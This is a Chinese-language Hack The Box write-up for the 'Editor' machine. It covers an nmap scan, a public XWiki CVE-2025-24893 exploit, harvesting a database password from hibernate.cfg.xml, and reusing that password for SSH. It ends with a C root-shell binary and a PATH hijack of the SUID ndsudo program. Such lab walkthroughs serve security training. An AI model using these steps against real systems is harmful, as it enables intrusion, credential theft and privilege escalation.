Editor-htb #
端口扫描8080进去 #
┌──(root㉿kali)-[~]
└─# nmap 10.10.11.80
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-02 12:19 CST
Nmap scan report for editor.htb (10.10.11.80)
Host is up (1.3s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
发现是一共XWIKI用POC打
hackersonsteroids/cve-2025-24893: Modified exploit for CVE-2025-24893
拿到shell #
find /var/lib/xwiki/ /etc/xwiki/ /opt/xwiki/ -name "*config*" -o -name "*.properties" -o -name "*.xml" 2>/dev/null
查询数据库文件
$ find /var/lib/xwiki/ /etc/xwiki/ /opt/xwiki/ -name "*config*" -o -name "*.properties" -o -name "*.xml" 2>/dev/null
/var/lib/xwiki/data/configuration.properties
/var/lib/xwiki/data/store/file/xwiki/b/f/8fb536bfe96480556241885cb20974/attachments/e/6/d4cbb35779b27121c39efde2a23520/~METADATA.xml
/var/lib/xwiki/data/store/solr/events_9/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/events_9/core.properties
/var/lib/xwiki/data/store/solr/extension_index_9/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/extension_index_9/core.properties
/var/lib/xwiki/data/store/solr/solr.xml
/var/lib/xwiki/data/store/solr/events/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/events/core.properties
/var/lib/xwiki/data/store/solr/search/META-INF/maven/org.xwiki.platform/xwiki-platform-search-solr-server-core/pom.xml
/var/lib/xwiki/data/store/solr/search/META-INF/maven/org.xwiki.platform/xwiki-platform-search-solr-server-core/pom.properties
/var/lib/xwiki/data/store/solr/search/conf/elevate.xml
/var/lib/xwiki/data/store/solr/search/conf/currency.xml
/var/lib/xwiki/data/store/solr/search/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/search/core.properties
/var/lib/xwiki/data/store/solr/search_9/conf/managed-schema.xml
/var/lib/xwiki/data/store/solr/search_9/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/search_9/core.properties
/var/lib/xwiki/data/store/solr/extension_index/conf/solrconfig.xml
/var/lib/xwiki/data/store/solr/extension_index/core.properties
/var/lib/xwiki/data/extension/history/2025.06.13.xml
/var/lib/xwiki/data/jobs/status/store.properties
/var/lib/xwiki/data/jobs/status/3/distribution/log.xml
/var/lib/xwiki/data/jobs/status/3/solr/indexer/log.xml
/var/lib/xwiki/data/jobs/status/extension/index/log.xml
/var/lib/xwiki/data/jobs/status/solr/indexer/log.xml
/var/lib/xwiki/tmp/start_1826614924204897555.properties
/etc/xwiki/portlet.xml
/etc/xwiki/jetty-web.xml
/etc/xwiki/jetty-ee8-web.xml
/etc/xwiki/cache/infinispan/config.xml
/etc/xwiki/hibernate.cfg.xml
/etc/xwiki/xwiki.properties
/etc/xwiki/sun-web.xml
/etc/xwiki/web.xml
/etc/xwiki/jboss-deployment-structure.xml
/etc/xwiki/xwiki-tomcat9.xml
/etc/xwiki/version.properties
/etc/xwiki/logback.xml
问了下AI 查看这个文件
$ cat /etc/xwiki/hibernate.cfg.xml
<property name="hibernate.connection.username">xwiki</property>
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
<property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
<property name="hibernate.dbcp.poolPreparedStatements">true</property>
<property name="hibernate.dbcp.maxOpenPreparedStatements">20</property>
拿到了数据库账号密码
查看passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:115:121:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false
发现用户oliver
这里数据库密码可以登录
发现一个suid程序ndsudo
这里你执行nvme-list 他会执行 nvme程序 所以我们用变量劫持
#include <unistd.h>
int main() {
setuid(0); setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
编译后传上去
scp nvme oliver@10.10.11.80:/tmp
oliver@10.10.11.80's password:
nvme
export PATH=/tmp:$PATH 成功提权
learning #
Xwiki POC https://github.com/hackersonsteroids/cve-2025-24893
find /var/lib/xwiki/ /etc/xwiki/ /opt/xwiki/ -name "*config*" -o -name "*.properties" -o -name "*.xml" 2>/dev/null 搜索
MySQL/MariaDB /etc/mysql/my.cnf 或 /etc/my.cnf 关键配置文件
/etc/xwiki/hibernate.cfg.xml XWiki 企业 wiki 平台核心数据库配置文件,
export PATH=/tmp:$PATH 追加`/tmp`到 PATH 最前,保留原有路径